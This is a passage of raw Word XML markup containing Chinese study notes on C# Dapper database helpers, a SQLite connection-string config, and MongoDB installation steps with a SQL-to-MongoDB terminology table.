          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> param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 xml:space="preserve">, IDbTransaction transaction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IDbConnection conn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try</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conn = Dapper.DapperManager.GetConnection();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conn.Open();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var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> list = conn.Query&lt;T&gt;(sql, param, transaction);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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> List&lt;T&gt;;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catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(Exception ex)</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throw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ex;</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finally</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conn.Close();</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单值查询</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sql</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param</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transaction</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&lt;returns&gt;&lt;/returns&gt;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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExecuteScalar(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> param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 xml:space="preserve">, IDbTransaction transaction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IDbConnection conn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try</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conn = Dapper.DapperManager.GetConnection();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var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj = conn.ExecuteScalar&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;(sql, param, transaction, 3, CommandType.Text);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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj;</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catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Exception ex)</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throw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ex;</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finally</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conn.Close();</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后新建一个单元测试项目测试一下能否查询和修改，别忘了在单元测试项目中添加App</w:t>
      </w:r>
      <w:r>
        <w:t>.Config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件并加入连接字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r>
        <w:t>.Config：</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 xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>connectionStrings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;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 xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>XXX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>connectionString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Data Source=XXX.db;Version=3;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>connectionStrings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="Times New Roman" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/liangyj66/article/details/67637370" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(C#) SQLite数据库连接字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://sqlite.org/download.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlite官网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.runoob.com/sqlite/sqlite-installation.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlite安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Dapper</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非关系型数据库(Nosql-Not Only Sql)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MongoDb：是一个基于分布式文件存储的数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hbase：属于hadoop(分布式系统)生态圈的组件，能存储海量数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cassandra：优异的列式存储NoSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Redis：基于内存的数据存储系统，支持多种类型存储，适用于高并发场合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Memcache：基于内存的数据存储系统，高性能分布式内存缓存服务，适用于高并发场合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MongoDB的安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先下载Linux x64的安装包: </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.mongodb.com/download-center" \l "atlas" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.mongodb.com/download-center#atlas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将安装包放到/usr目录下解压mongodb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在mongodb的根路径下创建一个data文件夹，data里在创建一个db文件夹</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在mongodb的bin目录下打开终端执行：./mongod --dbpath=../data/db启动服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们测试一下是否可以使用MongoDB吧，在bin目录另外打开终端执行：mongo 会看到当前MongoDB的版本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行mongo 打开客户端，或者使用使用管理工具如robo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MongoDB与SQL的对应表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widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MongoDB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rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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rPr>
              <w:t>Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Collection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rPr>
              <w:t>Row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Document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rPr>
              <w:t>Column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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rPr>
              <w:t>Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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rPr>
              <w:t>Table join</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$lookup,embedded document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rPr>
              <w:t>Primary key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>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rPr>
              <w:t>Aggreagation(聚合)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
